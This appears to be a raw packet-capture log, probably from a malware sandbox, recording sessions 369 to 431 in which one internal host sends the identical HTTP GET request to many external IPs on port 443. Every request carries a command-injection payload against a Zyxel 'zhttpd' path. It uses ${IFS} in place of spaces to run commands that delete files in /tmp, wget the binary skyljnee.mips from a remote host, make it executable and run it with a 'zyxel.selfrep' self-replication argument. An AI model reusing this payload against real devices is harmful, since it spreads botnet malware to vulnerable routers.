                                                369192.168.2.233469272.113.0.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.547118902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                370192.168.2.233386457.89.65.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:15:59.547123909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                371192.168.2.234260299.125.77.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550074100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                372192.168.2.235304084.41.122.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550098896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                373192.168.2.2358504153.118.82.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550103903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                374192.168.2.234333897.209.143.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550132036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                375192.168.2.2336090175.53.185.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550170898 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                376192.168.2.2343734177.187.131.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550187111 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                377192.168.2.2345750220.15.165.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550201893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                378192.168.2.2352860151.3.197.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550201893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                379192.168.2.2354986135.118.159.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550230980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                380192.168.2.2333606148.213.157.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550249100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                381192.168.2.23365322.54.10.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550303936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                382192.168.2.2335632206.5.93.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550317049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                383192.168.2.2337064123.35.56.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550318956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                384192.168.2.2338518191.132.86.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550343037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                385192.168.2.235631872.55.56.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550373077 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                386192.168.2.2350814209.172.6.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550400019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                387192.168.2.2350702132.93.63.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550417900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                388192.168.2.2337790128.127.223.74443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550441980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                389192.168.2.2346118111.35.156.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550482988 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                390192.168.2.2338996131.248.122.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550489902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                391192.168.2.234043032.165.174.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550513983 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                392192.168.2.235160446.216.224.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550612926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                393192.168.2.2344810149.132.32.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550669909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                394192.168.2.2339840167.131.9.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550705910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                395192.168.2.2352448170.0.160.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550710917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                396192.168.2.2334690139.179.152.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550741911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                397192.168.2.2351018160.35.39.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550748110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                398192.168.2.2344656210.156.123.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:00.550765991 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                399192.168.2.234981243.231.241.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553673029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                400192.168.2.2334264130.189.44.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553708076 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                401192.168.2.2336346161.102.28.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553741932 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                402192.168.2.2360978105.244.112.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553772926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                403192.168.2.234737460.53.119.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553788900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                404192.168.2.2340630190.184.37.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553811073 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                405192.168.2.2339068180.146.88.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553848982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                406192.168.2.2345298193.180.234.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553855896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                407192.168.2.2342636210.51.23.123443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553881884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                408192.168.2.2340178132.124.236.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553913116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                409192.168.2.234453037.92.132.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553924084 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                410192.168.2.2353338210.61.93.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:01.553956985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                411192.168.2.2351054102.54.69.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556765079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                412192.168.2.234457489.37.197.178443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556765079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                413192.168.2.234538081.82.204.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556808949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                414192.168.2.2340306178.178.142.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556812048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                415192.168.2.235994657.250.114.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556842089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                416192.168.2.2348044158.93.221.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556845903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                417192.168.2.2334812158.118.252.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556880951 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                418192.168.2.2333886102.187.121.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556895971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                419192.168.2.235222414.240.159.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.556917906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                420192.168.2.2360316159.35.216.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.557005882 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                421192.168.2.2342248116.93.126.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.557064056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                422192.168.2.234267472.33.146.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.557099104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                423192.168.2.2335006124.89.223.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.557105064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                424192.168.2.2339468118.25.197.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.557138920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                425192.168.2.234410491.145.115.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:02.557145119 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                426192.168.2.2342868223.63.40.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559818029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                427192.168.2.2335070117.212.174.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559842110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                428192.168.2.2345418201.72.92.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559864044 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                429192.168.2.2337968167.94.73.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559871912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                430192.168.2.235337884.228.182.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:03.559891939 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                431192.168.2.233668473.190.23.194443
                                                TimestampBytes transferredDirectionData
